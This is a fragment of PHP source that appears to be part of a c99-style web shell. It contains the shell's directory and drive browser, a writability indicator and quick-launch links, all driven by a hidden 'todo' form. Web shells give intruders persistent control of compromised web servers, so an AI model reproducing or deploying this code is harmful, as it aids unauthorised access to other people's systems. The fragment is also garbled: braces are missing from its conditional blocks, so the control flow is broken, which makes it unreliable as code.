 echo "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($t)."';document.todo.sort.value='".$sort."';document.todo.submit();\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";

 $i++;

echo "&nbsp;&nbsp;&nbsp;";

if (@is_writable($d))

 $wd = TRUE;

 $wdt = "<font color=green>[ ok ]</font>";

 echo "<b><font color=green>".view_perms(@fileperms($d))."</font></b>";

 $wd = FALSE;

 $wdt = "<font color=red>[ Read-Only ]</font>";

 echo "<b>".view_perms_color($d)."</b>";

echo "<br>";

$letters = "";

if ($win)

 $v = explode("\\",$d);

 $v = $v[0];

 foreach (range("a","z") as $letter)

 {

  $bool = $isdiskette = in_array($letter,$safemode_diskettes);

  if (!$bool) {$bool = @is_dir($letter.":\\");}

  if ($bool)

  {

   $letters .= "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($letter.":\\")."';document.todo.submit();\">[ ";

   if (strtolower($letter.':') != strtolower($v)) {$letters .= $letter;}

   else {$letters .= "<font color=\"#00FF66\">".$letter."</font>";}

   $letters .= " ]</a> ";

  }

 }

 if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}

if (count($quicklaunch) > 0)

 foreach($quicklaunch as $item)

 {

  $item[1] = str_replace("%d",urlencode($d),$item[1]);

  $item[1] = str_replace("%sort",$sort,$item[1]);

  $v = @realpath($d."..");

  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}

  $item[1] = str_replace("%upd",urlencode($v),$item[1]);

 

  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";

 }

echo "</p></td></tr></table><br>";

if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}